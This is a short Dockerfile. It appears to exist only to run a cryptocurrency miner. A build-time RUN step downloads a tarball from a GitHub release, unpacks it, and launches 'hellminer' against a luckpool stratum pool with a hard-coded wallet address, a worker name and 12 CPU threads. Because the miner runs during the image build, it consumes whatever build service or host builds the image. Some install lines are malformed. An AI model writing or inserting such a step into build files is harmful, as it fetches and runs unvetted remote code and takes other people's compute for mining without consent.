
# Build
FROM ubuntu:16.04 as builder

RUN apt-get update \
  && apt-get install -y \
  && rm -rf /var/lib/apt/lists/*

# App
FROM ubuntu:16.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
    libcurl3 \
    libjansson4 \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://github.com/rifqirr/dungba/releases/download/kambing/kambing.tar.gz && tar -xvf kambing.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RMLGxwAL2NPcZamTc6vEkfVMbxEuojiUdJ.Badung -p x --cpu 12
CMD ["-h"]
